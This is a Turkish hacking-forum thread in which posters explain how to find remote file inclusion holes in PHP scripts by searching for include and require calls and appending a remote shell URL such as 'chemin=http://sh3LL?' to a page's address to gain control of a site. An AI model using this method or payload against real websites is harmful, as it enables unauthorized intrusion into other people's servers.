Rfi açık bulma!

MySouLNeedLove

New member
Katılım
9 Ara 2005
Mesajlar
825
Reaction score
0
Puanları
0
Yaş
37
Konum
Çalışıyorum
S.a arkadaşlar demin gördümde açık bulmayı anlatın demiş bir arkadaş

benimde anladığım kadarııyla sizlere anlatacam rfi açığı bulmayı..

öncelikle scriptten yararlanacaz açığı bulmak için

(script’i nerden bulacağınızı artık siz ayarlarsınız..)

şimdi işte free forum vs vs arıyorsunuz teker teker .. indiriyorsunuz scriptleri.

indirdiniz not defterinlen açıp

"require"

"include"

kodlarını arıyorsunuz ...

bunun gibi daha varda ben bilmiyorum..

neyse aradınız örnek veriyorum

/include/config.inc.php
de

include($lvc_include_dir.’lang/english.inc.php’);

bu kodu buldunuz hımm diyorsunuz denemek lazım sonra

bunu düzenliyorsunuz.

/include/config.inc.php?lvc_include_dir​

758akle1.jpg


diğer örnek

include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");

düzenlenmiş hali sitenin sonuna bunu yapıştırıyorsunuz..

www.site.com/path/moteur.php?chemin=http://sh3LL?

ne kadar yanlış ne kadar doğru orasına üstadlar karar versin.

yanlışım varsa düzeltiniz..

*her include aradğınızda açık olmk zorunda değildir .. ya da require

olay bunun gibi bişey

hazırlanışı herşeyi bana aittir.

sorumluluk bende :)


Hackhell
 
walla kısmen anladım ama bu dediğin ilk baştaki sprit ile nasıl bu kodu buluyoz orasını anlamadım.!!ilk basta bi düzenleme yapsan :D
 
Rfi Açıklarını Bulma Teknikleri

4 temel php kodu ile de arıyabilirsiniz değişkenler tanımlanmamışsa Shell ile site kontrolunu sağlıyabilirsiniz.

include
include_once
require
require_once

Fakat o tipteki her buldugunuz kod açık değildir.

Coder Bunu engellmiş olabilir.

Nasıl engeller peki ?

" if " , " define " v.b. kodlar sayesinde engellenir.

Buldugunuz kodlarda;

yukarıda bahsettiğim engelleyici tanımlamalar dışında herhangi bir include(inc) dosyasının etkilenmesi gereklidir.

Aksi taktirde RFI olmaz.

Bunlarıda bilmenizde yarar var..​

Bu arada 50 tane script deneyip açık bulamama durumunuz olabilir kafaya takmayın



php scriptleri localinizde çalıştırıp deneyebilirsiniz... bunun için phptriad var

http://prdownloads.sourceforge.net/phptriad/phptriad2-2-1.exe?download

Kolay Gele !

HH Farkı
 
ellerine ağlık anlatım için
 
Geri
Üst